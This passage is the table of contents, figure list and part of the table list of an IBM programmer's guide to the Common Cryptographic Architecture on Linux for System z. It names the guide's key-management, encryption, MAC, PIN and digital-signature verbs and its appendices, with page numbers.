(CSUACFV) . . . . . . . . . . . . . . . . . . . . . . . 84 +Cryptographic ResourceAllocate (CSUACRA) . . . . . . . . . . . . . . . . . . . . . . 86 +Cryptographic Resource Deallocate (CSUACRD). . . . . . . . . . . . . . . . . . . . . 88 +Key Storage Initialization (CSNBKSI) . . . . . . . . . . . . . . . . . . . . . . . . . 90 +Master Key Process (CSNBMKP) . . . . . . . . . . . . . . . . . . . . . . . . . . 93 +Questionable DES keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 +Random Number Tests (CSUARNT) . . . . . . . . . . . . . . . . . . . . . . . . . 97 +|| Chapter5. ManagingAES and DES cryptographic keys . . . . . . . . . . . . . . . . . 99 +Clear Key Import (CSNBCKI). . . . . . . . . . . . . . . . . . . . . . . . . . . . 100 +Control Vector Generate (CSNBCVG) . . . . . . . . . . . . . . . . . . . . . . . . 102 +Control Vector Translate (CSNBCVT). . . . . . . . . . . . . . . . . . . . . . . . . 104 +Cryptographic Variable Encipher (CSNBCVE). . . . . . . . . . . . . . . . . . . . . . 107 +Data Key Export (CSNBDKX) . . . . . . . . . . . . . . . . . . . . . . . . . . . 109 +Data Key Import (CSNBDKM) . . . . . . . . . . . . . . . . . . . . . . . . . . . 111 +Diversified Key Generate (CSNBDKG) . . . . . . . . . . . . . . . . . . . . . . . . 113 +Key Export (CSNBKEX). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117 +Key Generate (CSNBKGN) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120 +|| Key Generate2 (CSNBKGN2) . . . . . . . . . . . . . . . . . . . . . . . . . . . 128 +Key Import (CSNBKIM). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133 +Key Part Import (CSNBKPI) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136 +|| Key Part Import2 (CSNBKPI2) . . . . . . . . . . . . . . . . . . . . . . . . . . . 139 +Key Test (CSNBKYT) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 143 +|| Key Test2 (CSNBKYT2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147 +Key Test Extended (CSNBKYTX) . . . . . . . . . . . . . . . . . . . . . . . . . . 150 +iv LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Key Token Build (CSNBKTB). . . . . . . . . . . . . . . . . . . . . . . . . . . . 155 +|| Key Token Build2 (CSNBKTB2). . . . . . . . . . . . . . . . . . . . . . . . . . . 159 +Key Token Change (CSNBKTC) . . . . . . . . . . . . . . . . . . . . . . . . . . 163 +|| Key Token Change2 (CSNBKTC2). . . . . . . . . . . . . . . . . . . . . . . . . . 166 +Key Token Parse (CSNBKTP) . . . . . . . . . . . . . . . . . . . . . . . . . . . 169 +Key Translate (CSNBKTR) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173 +|| Key Translate2 (CSNBKTR2). . . . . . . . . . . . . . . . . . . . . . . . . . . . 175 +Multiple Clear Key Import (CSNBCKM) . . . . . . . . . . . . . . . . . . . . . . . . 179 +PKADecrypt (CSNDPKD). . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182 +PKAEncrypt (CSNDPKE) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 185 +Prohibit Export (CSNBPEX) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188 +Prohibit Export Extended (CSNBPEXX). . . . . . . . . . . . . . . . . . . . . . . . 189 +Random Number Generate (CSNBRNG) . . . . . . . . . . . . . . . . . . . . . . . 191 +Random Number Generate Long (CSNBRNGL). . . . . . . . . . . . . . . . . . . . . 193 +|| Restrict KeyAttribute (CSNBRKA). . . . . . . . . . . . . . . . . . . . . . . . . . 195 +Symmetric Key Export (CSNDSYX) . . . . . . . . . . . . . . . . . . . . . . . . . 198 +Symmetric Key Generate (CSNDSYG) . . . . . . . . . . . . . . . . . . . . . . . . 201 +Symmetric Key Import (CSNDSYI). . . . . . . . . . . . . . . . . . . . . . . . . . 205 +|| Symmetric Key Import2 (CSNDSYI2). . . . . . . . . . . . . . . . . . . . . . . . . 208 +Chapter6. Protecting data . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211 +|| Modes of operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211 +|| Cipher Block Chaining (CBC) mode . . . . . . . . . . . . . . . . . . . . . . . . 211 +|| Electronic Code Book (ECB) mode . . . . . . . . . . . . . . . . . . . . . . . . 211 +|| Processing rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211 +|| Triple-DES encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212 +Decipher (CSNBDEC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213 +Encipher (CSNBENC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217 +SymmetricAlgorithm Decipher (CSNBSAD) . . . . . . . . . . . . . . . . . . . . . . 221 +SymmetricAlgorithm Encipher (CSNBSAE) . . . . . . . . . . . . . . . . . . . . . . 226 +Chapter7. Verifying data integrity and authenticating messages . . . . . . . . . . . . . 233 +How MACs are used. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233 +How hashing functions and MDCs are used . . . . . . . . . . . . . . . . . . . . . . 234 +|| HMAC Generate (CSNBHMG) . . . . . . . . . . . . . . . . . . . . . . . . . . . 235 +|| HMAC Verify (CSNBHMV). . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238 +MAC Generate (CSNBMGN). . . . . . . . . . . . . . . . . . . . . . . . . . . . 241 +MAC Verify (CSNBMVR) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245 +MDC Generate (CSNBMDG). . . . . . . . . . . . . . . . . . . . . . . . . . . . 249 +One-Way Hash (CSNBOWH). . . . . . . . . . . . . . . . . . . . . . . . . . . . 258 +Chapter8. Key storage mechanisms . . . . . . . . . . . . . . . . . . . . . . . . 261 +Key labels and key-storage management . . . . . . . . . . . . . . . . . . . . . . . 261 +Key storage with Linux for IBM System z, in contrast to z/OS for IBM System z . . . . . . . . . 263 +AES Key Record Create (CSNBAKRC) . . . . . . . . . . . . . . . . . . . . . . . . 267 +AES Key Record Delete (CSNBAKRD) . . . . . . . . . . . . . . . . . . . . . . . . 269 +AES Key Record List (CSNBAKRL) . . . . . . . . . . . . . . . . . . . . . . . . . 271 +AES Key Record Read (CSNBAKRR) . . . . . . . . . . . . . . . . . . . . . . . . 274 +AES Key Record Write (CSNBAKRW) . . . . . . . . . . . . . . . . . . . . . . . . 276 +DES Key Record Create (CSNBKRC) . . . . . . . . . . . . . . . . . . . . . . . . 278 +DES Key Record Delete (CSNBKRD) . . . . . . . . . . . . . . . . . . . . . . . . 280 +DES Key Record List (CSNBKRL). . . . . . . . . . . . . . . . . . . . . . . . . . 282 +DES Key Record Read (CSNBKRR) . . . . . . . . . . . . . . . . . . . . . . . . . 284 +DES Key Record Write (CSNBKRW). . . . . . . . . . . . . . . . . . . . . . . . . 286 +PKAKey Record Create (CSNDKRC) . . . . . . . . . . . . . . . . . . . . . . . . 288 +PKAKey Record Delete (CSNDKRD) . . . . . . . . . . . . . . . . . . . . . . . . 290 +Contents v + +PKAKey Record List (CSNDKRL). . . . . . . . . . . . . . . . . . . . . . . . . . 292 +PKAKey Record Read (CSNDKRR) . . . . . . . . . . . . . . . . . . . . . . . . . 295 +PKAKey Record Write (CSNDKRW) . . . . . . . . . . . . . . . . . . . . . . . . . 297 +Retained Key Delete (CSNDRKD). . . . . . . . . . . . . . . . . . . . . . . . . . 299 +Retained Key List (CSNDRKL) . . . . . . . . . . . . . . . . . . . . . . . . . . . 301 +Chapter9. Financial services . . . . . . . . . . . . . . . . . . . . . . . . . . . 303 +How personal identification numbers (PINs) are used. . . . . . . . . . . . . . . . . . . 303 +How VISAcard verification values are used . . . . . . . . . . . . . . . . . . . . . . 303 +Translating data and PINs in networks . . . . . . . . . . . . . . . . . . . . . . . . 304 +|| Working with Europay-Mastercard-Visa Smart cards . . . . . . . . . . . . . . . . . . . 304 +PIN verbs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304 +|| ANSI X9.8 PIN restrictions. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 306 +The PIN profile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307 +Clear PIN Encrypt (CSNBCPE) . . . . . . . . . . . . . . . . . . . . . . . . . . . 312 +Clear PIN Generate (CSNBPGN) . . . . . . . . . . . . . . . . . . . . . . . . . . 315 +Clear PIN GenerateAlternate (CSNBCPA). . . . . . . . . . . . . . . . . . . . . . . 318 +CVV Generate (CSNBCSG) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322 +CVV Verify (CSNBCSV) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 325 +Encrypted PIN Generate (CSNBEPG) . . . . . . . . . . . . . . . . . . . . . . . . 328 +Encrypted PIN Translate (CSNBPTR) . . . . . . . . . . . . . . . . . . . . . . . . 332 +Encrypted PIN Verify (CSNBPVR) . . . . . . . . . . . . . . . . . . . . . . . . . . 338 +PIN Change/Unblock (CSNBPCU). . . . . . . . . . . . . . . . . . . . . . . . . . 342 +Secure Messaging for Keys (CSNBSKY) . . . . . . . . . . . . . . . . . . . . . . . 348 +Secure Messaging for PINs (CSNBSPN) . . . . . . . . . . . . . . . . . . . . . . . 351 +Transaction Validation (CSNBTRV) . . . . . . . . . . . . . . . . . . . . . . . . . 355 +Chapter10. Using digital signatures . . . . . . . . . . . . . . . . . . . . . . . . 359 +Digital Signature Generate (CSNDDSG). . . . . . . . . . . . . . . . . . . . . . . . 360 +Digital Signature Verify (CSNDDSV) . . . . . . . . . . . . . . . . . . . . . . . . . 364 +Chapter11. Managing PKAcryptographic keys . . . . . . . . . . . . . . . . . . . . 369 +PKAKey Generate (CSNDPKG) . . . . . . . . . . . . . . . . . . . . . . . . . . 370 +PKAKey Import (CSNDPKI) . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374 +PKAKey Token Build (CSNDPKB). . . . . . . . . . . . . . . . . . . . . . . . . . 377 +PKAKey Token Change (CSNDKTC). . . . . . . . . . . . . . . . . . . . . . . . . 385 +PKAKey Translate (CSNDPKT). . . . . . . . . . . . . . . . . . . . . . . . . . . 388 +PKAPublic Key Extract (CSNDPKX) . . . . . . . . . . . . . . . . . . . . . . . . . 392 +Remote Key Export (CSNDRKX) . . . . . . . . . . . . . . . . . . . . . . . . . . 394 +Trusted Block Create (CSNDTBC). . . . . . . . . . . . . . . . . . . . . . . . . . 403 +AppendixA. Return codes and reason codes . . . . . . . . . . . . . . . . . . . . 407 +Return codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407 +Reason codes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407 +Reason codes that accompany return code 0. . . . . . . . . . . . . . . . . . . . . 408 +Reason codes that accompany return code 4. . . . . . . . . . . . . . . . . . . . . 408 +Reason codes that accompany return code 8. . . . . . . . . . . . . . . . . . . . . 409 +Reason codes that accompany return code 12 . . . . . . . . . . . . . . . . . . . . 418 +Reason codes that accompany return code 16 . . . . . . . . . . . . . . . . . . . . 419 +AppendixB. Key token formats . . . . . . . . . . . . . . . . . . . . . . . . . . 421 +|| AES internal key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 421 +Token Validation Value . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422 +|| DES internal key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423 +DES external key token. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 424 +DES null key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 425 +vi LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +RSApublic key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426 +RSAprivate external key token . . . . . . . . . . . . . . . . . . . . . . . . . . . 426 +|| RSAprivate internal key token . . . . . . . . . . . . . . . . . . . . . . . . . . . 430 +|| ECC key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436 +|| Associated data format for ECC private key token . . . . . . . . . . . . . . . . . . . 438 +|| AESKW wrapped payload format for ECC private key token . . . . . . . . . . . . . . . 439 +PKAnull key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439 +|| HMAC key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439 +|| HMAC variable-length symmetric key token . . . . . . . . . . . . . . . . . . . . . 439 +|| HMAC symmetric null key token . . . . . . . . . . . . . . . . . . . . . . . . . 443 +Trusted blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444 +Trusted block organization. . . . . . . . . . . . . . . . . . . . . . . . . . . . 444 +AppendixC. Key forms and types used in the Key Generate verb . . . . . . . . . . . . 459 +Generating an operational key . . . . . . . . . . . . . . . . . . . . . . . . . . . 459 +Generating an importable key . . . . . . . . . . . . . . . . . . . . . . . . . . . 459 +Generating an exportable key . . . . . . . . . . . . . . . . . . . . . . . . . . . 459 +Examples of single-length keys in one form only . . . . . . . . . . . . . . . . . . . . 459 +Examples of OPIM single-length, double-length, and triple-length keys in two forms . . . . . . . 460 +Examples of OPEX single-length, double-length, and triple-length keys in two forms . . . . . . . 460 +Examples of IMEX single-length and double-length keys in two forms. . . . . . . . . . . . . 461 +Examples of EXEX single-length and double-length keys in two forms . . . . . . . . . . . . 461 +AppendixD. Control vectors and changing control vectors with the Control Vector Translate +verb . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 463 +Control vector table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 463 +Control-vector-base bit maps. . . . . . . . . . . . . . . . . . . . . . . . . . . 465 +Key Form Bits, 'fff'. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 468 +Specifying a control-vector-base value . . . . . . . . . . . . . . . . . . . . . . . 468 +Changing control vectors with the Control Vector Translate verb. . . . . . . . . . . . . . . 472 +Providing the control information for testing the control vectors . . . . . . . . . . . . . . 472 +Mask array preparation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 472 +Selecting the key-half processing mode. . . . . . . . . . . . . . . . . . . . . . . 474 +When the target key-token CV is null. . . . . . . . . . . . . . . . . . . . . . . . 476 +Control vector translate example . . . . . . . . . . . . . . . . . . . . . . . . . 476 +AppendixE. PIN formats and algorithms . . . . . . . . . . . . . . . . . . . . . . 477 +PIN notation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477 +PIN block formats. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 477 +PIN extraction rules . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479 +IBM PIN algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 480 +VISAPIN algorithms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487 +AppendixF. Cryptographic algorithms and processes . . . . . . . . . . . . . . . . . 491 +Cryptographic key-verification techniques . . . . . . . . . . . . . . . . . . . . . . . 491 +Modification Detection Code calculation. . . . . . . . . . . . . . . . . . . . . . . . 493 +Ciphering methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494 +MAC calculation methods . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 502 +RSAkey-pair generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 504 +Multiple decipherment and encipherment . . . . . . . . . . . . . . . . . . . . . . . 504 +PKA92 key format and encryption process. . . . . . . . . . . . . . . . . . . . . . . 511 +Formatting hashes and keys in public-key cryptography . . . . . . . . . . . . . . . . . . 513 +AppendixG.Access control points and verbs . . . . . . . . . . . . . . . . . . . . 515 +TKE Version 6.0 and higher . . . . . . . . . . . . . . . . . . . . . . . . . . . . 525 +Contents vii + +AppendixH. Sample verb call routines . . . . . . . . . . . . . . . . . . . . . . . 527 +Sample program in C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 527 +Sample program in Java . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532 +AppendixI. Initial system set up tips . . . . . . . . . . . . . . . . . . . . . . . . 537 +Installing and loading the cryptographic device driver. . . . . . . . . . . . . . . . . . . 537 +zcrypt device driver usage. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537 +High resolution polling timer . . . . . . . . . . . . . . . . . . . . . . . . . . . 538 +The sysfs interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538 +Running secure key under a z/VM guest . . . . . . . . . . . . . . . . . . . . . . . 539 +AppendixJ. CCAinstallation instructions . . . . . . . . . . . . . . . . . . . . . . 541 +Before you begin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 541 +Download and install the RPM . . . . . . . . . . . . . . . . . . . . . . . . . . . 541 +Files in the RPM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 542 +Samples in the RPM. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543 +Groups in the RPM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543 +Install and configure the RPM . . . . . . . . . . . . . . . . . . . . . . . . . . 543 +Uninstall the RPM. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547 +|| AppendixK. Coexistence of CEX3C and CEX2C features . . . . . . . . . . . . . . . . 549 +|| Legacy support. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549 +|| Concurrent installations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549 +|| Dual Support: Key storage interactions . . . . . . . . . . . . . . . . . . . . . . . 551 +|| Dual Support: TKE catcher can run in only one instance. . . . . . . . . . . . . . . . . 552 +AppendixL. Utilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 553 +The panel.exe utility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 553 +panel.exe syntax . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 553 +panel.exe functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 554 +Using panel.exe for key storage initialization . . . . . . . . . . . . . . . . . . . . . 555 +Using panel.exe for key storage reencipher when changing the master key. . . . . . . . . . 556 +Accessibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 559 +Documentation accessibility . . . . . . . . . . . . . . . . . . . . . . . . . . . . 559 +IBM and accessibility. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 559 +Notices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561 +Programming interface information. . . . . . . . . . . . . . . . . . . . . . . . . . 562 +Trademarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 562 +Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 565 +viii LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Figures +|| 1. CCAsecurityAPI, access layer, and cryptographic engine . . . . . . . . . . . . . . . . 4 +|| 2. CPACF . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 +3. Control Vector Generate and Key Token Build CV keyword combinations . . . . . . . . . . 30 +4. PKAkey management. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 +5. Control vector base bit map (common bits and key-encrypting keys) . . . . . . . . . . . 465 +6. Control vector base bit map (data operation keys) . . . . . . . . . . . . . . . . . . 466 +7. Control vector base bit map (PIN processing keys and cryptographic variable-encrypting keys) 467 +8. Control vector base bit map (key generating keys) . . . . . . . . . . . . . . . . . . 468 +9. Control Vector Translate verb mask_array processing. . . . . . . . . . . . . . . . . 474 +10. Control Vector Translate verb. . . . . . . . . . . . . . . . . . . . . . . . . . 475 +11. ISO-3 PIN-block format . . . . . . . . . . . . . . . . . . . . . . . . . . . . 478 +12. 3624 PIN generation algorithm . . . . . . . . . . . . . . . . . . . . . . . . . 481 +13. GBP PIN generation algorithm . . . . . . . . . . . . . . . . . . . . . . . . . 482 +14. PIN-Offset generation algorithm . . . . . . . . . . . . . . . . . . . . . . . . . 483 +15. PIN verification algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . 485 +16. GBP PIN verification algorithm . . . . . . . . . . . . . . . . . . . . . . . . . 487 +17. PVV generation algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . 488 +18. Triple-DES data encryption and decryption. . . . . . . . . . . . . . . . . . . . . 495 +19. Enciphering using theANSI X3.106 CBC method . . . . . . . . . . . . . . . . . . 496 +20. Deciphering using the CBC method . . . . . . . . . . . . . . . . . . . . . . . 497 +21. Enciphering using theANSI X9.23 method . . . . . . . . . . . . . . . . . . . . . 498 +22. Deciphering using theANSI X9.23 method. . . . . . . . . . . . . . . . . . . . . 498 +23. Triple-DES CBC encryption process . . . . . . . . . . . . . . . . . . . . . . . 499 +24. Triple-DES CBC decryption process . . . . . . . . . . . . . . . . . . . . . . . 500 +25. EDE algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501 +26. DED process. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 502 +27. MAC calculation method . . . . . . . . . . . . . . . . . . . . . . . . . . . 503 +28. Multiple encipherment of single-length keys . . . . . . . . . . . . . . . . . . . . 506 +29. Multiple decipherment of single-length keys . . . . . . . . . . . . . . . . . . . . 507 +30. Multiple encipherment of double-length keys . . . . . . . . . . . . . . . . . . . . 508 +31. Multiple decipherment of double-length keys . . . . . . . . . . . . . . . . . . . . 509 +32. Multiple encipherment of triple-length keys . . . . . . . . . . . . . . . . . . . . . 510 +33. Multiple decipherment of triple-length keys . . . . . . . . . . . . . . . . . . . . . 511 +34. Syntax, sample routine in C . . . . . . . . . . . . . . . . . . . . . . . . . . 528 +35. Syntax, sample routine in Java . . . . . . . . . . . . . . . . . . . . . . . . . 533 +©CopyrightIBMCorp.2007,2011 ix + +x LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Tables +1.Key types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27 +2.Key subtypes specified by the rule_array keyword . . . . . . . . . . . . . . . . . . 29 +|| 3.Access Control Points Used byATM remote key loading . . . . . . . . . . . . . . . . 34 +4.Combinations of the verbs . . . . . . . . . . . . . . . . . . . . . . . . . . . 39 +5.Summary of CCAnodes and resource control verbs. . . . . . . . . . . . . . . . . . 40 +6.Summary of CCAAES, DES, and HMAC verbs . . . . . . . . . . . . . . . . . . . 40 +7.Summary of PKAkey token sections . . . . . . . . . . . . . . . . . . . . . . . 48 +8.Summary of PKAverbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 +9.Keywords for Cryptographic Facility Query control information . . . . . . . . . . . . . . 59 +10.Cryptographic Facility Query information returned in the rule_array . . . . . . . . . . . . 61 +11. Output data format for STATKPR operational key parts. . . . . . . . . . . . . . . . . 73 +12.Output data format for STATICSAoperational key parts . . . . . . . . . . . . . . . . 74 +13.Output data format for STATICSE operational key parts . . . . . . . . . . . . . . . . 76 +|| 14.Output data format for STATICSB operational key parts . . . . . . . . . . . . . . . . 78 +15.Output data format for STATICSX operational key parts . . . . . . . . . . . . . . . . 81 +16.Keywords for Cryptographic ResourceAllocate control information . . . . . . . . . . . . 86 +17.Keywords for Cryptographic Resource Deallocate control information . . . . . . . . . . . 88 +18.Keywords for Key Storage Initialization control information . . . . . . . . . . . . . . . 90 +19.Keywords for Master Key Process control information . . . . . . . . . . . . . . . . . 94 +20.Keywords for Random Number Tests control information . . . . . . . . . . . . . . . . 97 +21.Keywords for Control Vector Translate control information . . . . . . . . . . . . . . . 105 +22.Keywords for Diversified Key Generate control information . . . . . . . . . . . . . . . 114 +23.Keywords for the Key Generate verb key_form parameter . . . . . . . . . . . . . . . 121 +|| 24.Key length values for the Key Generate verb . . . . . . . . . . . . . . . . . . . . 122 +25.Key Generate - key lengths for each key type. . . . . . . . . . . . . . . . . . . . 122 +26.Keywords for Key Generate, valid key types and key forms for a single key. . . . . . . . . 126 +27.Keywords for Key Generate, valid key types and key forms for a key pair . . . . . . . . . 126 +|| 28.Keywords for Key Generate2 control information. . . . . . . . . . . . . . . . . . . 128 +|| 29.Key Generate2 valid key type and key forms for HMAC keys . . . . . . . . . . . . . . 132 +|| 30.Required access control points for Key Generate2 . . . . . . . . . . . . . . . . . . 132 +31.Keywords for Key Part Import control information . . . . . . . . . . . . . . . . . . 137 +|| 32.Keywords for Key Part Import2 control information . . . . . . . . . . . . . . . . . . 140 +33.Verification pattern input and output . . . . . . . . . . . . . . . . . . . . . . . 143 +34.Keywords for Key Test control information . . . . . . . . . . . . . . . . . . . . . 144 +|| 35.Keywords for Key Test2 control information. . . . . . . . . . . . . . . . . . . . . 147 +36.Keywords for Key Test Extended control information . . . . . . . . . . . . . . . . . 151 +37.Keywords for Key Token Build control information . . . . . . . . . . . . . . . . . . 156 +|| 38.Keywords for Key Token Build2 control information. . . . . . . . . . . . . . . . . . 160 +39.Keywords for Key Token Change control information . . . . . . . . . . . . . . . . . 163 +|| 40.Keywords for Key Token Change2 control information. . . . . . . . . . . . . . . . . 166 +41.Keywords for Key Token Parse control information . . . . . . . . . . . . . . . . . . 170 +|| 42.Keywords for Key Translate2 control information. . . . . . . . . . . . . . . . . . . 175 +43.Keywords for Multiple Clear Key Import control information. . . . . . . . . . . . . . . 179 +44.Keywords for PKADecrypt control information . . . . . . . . . . . . . . . . . . . 182 +45.Keywords for PKAEncrypt control information. . . . . . . . . . . . . . . . . . . . 185 +46.Keywords for Random Number Generate form parameter . . . . . . . . . . . . . . . 191 +47.Keywords for Random Number Generate Long control information . . . . . . . . . . . . 193 +|| 48.Keywords for Restrict KeyAttribute control information . . . . . . . . . . . . . . . . 195 +49.Keywords for Symmetric Key Export control information . . . . . . . . . . . . . . . . 198 +50.Keywords for Symmetric Key Generate control information . . . . . . . . . . . . . . . 201 +51.Keywords for Symmetric Key Import control information . . . . . . . . . . . . . . . . 205 +|| 52.Keywords for Symmetric Key Import2 control information . . . . . . . . . . . . . . . 208 +|| 53.PKCS#1 OAEP encoded message layout (PKOAEP2) . . . . . . . . . . . . . . . . 209 +©CopyrightIBMCorp.2007,2011 xi + +54.Keywords for Decipher control information . . . . . . . . . . . . . . . . . . . . . 215 +55.Keywords for Encipher control information . . . . . . . . . . . . . . . . . . . . . 219 +56.Keywords for SymmetricAlgorithm Decipher control information . . . . . . . . . . . . . 222 +57.Keywords for SymmetricAlgorithm Encipher control information . . . . . . . . . . . . . 227 +|| 58.Keywords for HMAC Generate control information . . . . . . . . . . . . . . . . . . 235 +|| 59.Keywords for HMAC Verify control information . . . . . . . . . . . . . . . . . . . 238 +60.Keywords for MAC Generate control information. . . . . . . . . . . . . . . . . . . 242 +61.Keywords for MAC Verify control information . . . . . . . . . . . . . . . . . . . . 246 +62.Keywords for MDC Generate control information. . . . . . . . . . . . . . . . . . . 250 +63.Keywords for One-Way Hash control information. . . . . . . . . . . . . . . . . . . 258 +64.Valid symbols for the name token . . . . . . . . . . . . . . . . . . . . . . . . 262 +65.Key labels that are not valid . . . . . . . . . . . . . . . . . . . . . . . . . . 263 +66.Keywords forAES Key Record Delete control information . . . . . . . . . . . . . . . 269 +67.Keywords forAES Key Record Write control information. . . . . . . . . . . . . . . . 276 +68.Keywords for DES Key Record Delete control information . . . . . . . . . . . . . . . 280 +69.Keywords for PKAKey Record Delete control information . . . . . . . . . . . . . . . 290 +70.Keywords for PKAKey Record Write control information. . . . . . . . . . . . . . . . 297 +|| 71.ANSI X9.8 PIN -Allow onlyANSI PIN blocks . . . . . . . . . . . . . . . . . . . . 307 +72.Format of a PIN profile . . . . . . . . . . . . . . . . . . . . . . . . . . . . 307 +73.Format values of PIN blocks . . . . . . . . . . . . . . . . . . . . . . . . . . 308 +74.PIN block format and PIN extraction method keywords . . . . . . . . . . . . . . . . 308 +|| 75.Verbs affected by enhanced PIN security mode . . . . . . . . . . . . . . . . . . . 309 +76.Format of a pad digit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 310 +77.Pad digits for PIN block formats. . . . . . . . . . . . . . . . . . . . . . . . . 310 +78.Format of the Current Key Serial Number Field . . . . . . . . . . . . . . . . . . . 311 +79.Keywords for Clear PIN Encrypt control information . . . . . . . . . . . . . . . . . 313 +80.Keywords for Clear PIN Generate control information . . . . . . . . . . . . . . . . . 315 +81.Array elements for the Clear PIN Generate verb. . . . . . . . . . . . . . . . . . . 316 +82.Array elements for Clear PIN Generate . . . . . . . . . . . . . . . . . . . . . . 316 +|| 83.Keywords for Clear PIN GenerateAlternate control information . . . . . . . . . . . . . 319 +84.Array elements for Clear PIN GenerateAlternate, data_array (IBM-PINO) . . . . . . . . . 320 +85.Array elements for Clear PIN GenerateAlternate, data_array (VISA-PVV) . . . . . . . . . 320 +86.Keywords for CVV Generate control information . . . . . . . . . . . . . . . . . . . 322 +87.Keywords for CVV Verify control information . . . . . . . . . . . . . . . . . . . . 325 +88.Keywords for Encrypted PIN Generate control information . . . . . . . . . . . . . . . 329 +89.Array elements for Encrypted PIN Generate data_array parameter . . . . . . . . . . . . 329 +90.Keywords for Encrypted PIN Generate control information . . . . . . . . . . . . . . . 330 +91.Keywords for Encrypted PIN Translate control information . . . . . . . . . . . . . . . 333 +92.Additional names for PIN formats . . . . . . . . . . . . . . . . . . . . . . . . 336 +93.Keywords for Encrypted PIN Verify control information . . . . . . . . . . . . . . . . 339 +94.Array elements for Encrypted PIN Verify data_array parameter . . . . . . . . . . . . . 340 +95.Array elements required by the process rule . . . . . . . . . . . . . . . . . . . . 340 +96.Keywords for PIN Change/Unblock control information . . . . . . . . . . . . . . . . 343 +97.Keywords for Secure Messaging for Keys control information . . . . . . . . . . . . . . 348 +98.Keywords for Secure Messaging for PINs control information . . . . . . . . . . . . . . 351 +99.Keywords for Transaction Validation control information . . . . . . . . . . . . . . . . 355 +100.Values for Transaction Validation validation_values parameter. . . . . . . . . . . . . . 356 +101.Keywords for 